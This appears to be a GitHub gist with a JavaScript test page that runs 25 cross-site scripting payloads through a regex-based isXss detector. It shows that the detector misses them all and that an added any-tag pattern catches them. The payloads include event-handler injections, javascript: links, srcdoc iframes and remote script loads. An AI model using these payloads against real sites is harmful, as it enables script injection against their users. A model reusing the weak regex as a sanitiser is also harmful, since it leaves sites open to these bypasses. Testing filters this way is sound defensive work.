Created
March 26, 2018 22:18
-
-
Save cianmce/5a5ca7644a05f27e79bb484458ab83ef to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<script> | |
var xsss = [ | |
'<script >alert("XSS - 1");</script >', | |
'<script type="application/javascript">alert("XSS - 2");</script >', | |
'<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >', | |
'<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />', | |
'<input type="image" src onerror="alert(\"XSS - 5\")">', | |
'<object data="a.a" onerror="alert(\"XSS - 6\")" />', | |
'<object data="a.a" onerror="alert(\"XSS - 7\")">', | |
'<link data="a.a" onerror="alert(\"XSS - 8\")">', | |
'<input onfocus="console.log(\"XSS - 9\")" autofocus> // Uses console.log as "alert" will cause infinate loop', | |
'<video ><source onerror="alert(\"XSS - 10\")" >', | |
'<iframe srcdoc="<script>alert(\"XSS - 11\")</script>">', | |
'<iframe srcdoc="<script>alert(\"XSS - 12\")</script>" />', | |
'<iframe srcdoc="<script>alert(\"XSS - 13\")</script>"></iframe >', | |
'<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >', | |
'<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">', | |
'<iframe style="display:none;" src="//a.a" onload="alert(\"XSS - 16\");"></iframe >', | |
'<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 17\")"></div >', | |
'<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 18\")">', | |
'<frameset onload="alert(\"XSS - 19\")"><frame onload="Limited support"></frameset >', | |
'<a href="javascript:alert(\"XSS - 20\")" style="text-decoration: none; color:#000;" > ', | |
'<a onclick="alert(\"XSS - 21\")" style="text-decoration: none; color:#000;" > ', | |
'<a onmouseover="alert(\"XSS - 22\")" style="text-decoration: none; color:#000;" > ', | |
'<body onunload="alert(\"XSS - 23\")">', | |
'<body onresize="alert(\"XSS - 24\");">', | |
'<body onload="alert(\"XSS - 25\")">', | |
'<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">', | |
] | |
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i') | |
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i') | |
const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>') | |
// Current isXss function | |
function isXss (value) { | |
return xssSimple.test(value) || xssImgSrc.test(value) | |
} | |
// prints false for all | |
for(var i in xsss){ | |
console.log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)"); | |
} | |
// Current isXss function that also checks for any tags | |
function isXss (value) { | |
return xssSimple.test(value) || xssImgSrc.test(value) || xssAnyTag.test(value) | |
} | |
// prints true for all | |
for(var i in xsss){ | |
console.log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)"); | |
} | |
</script> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment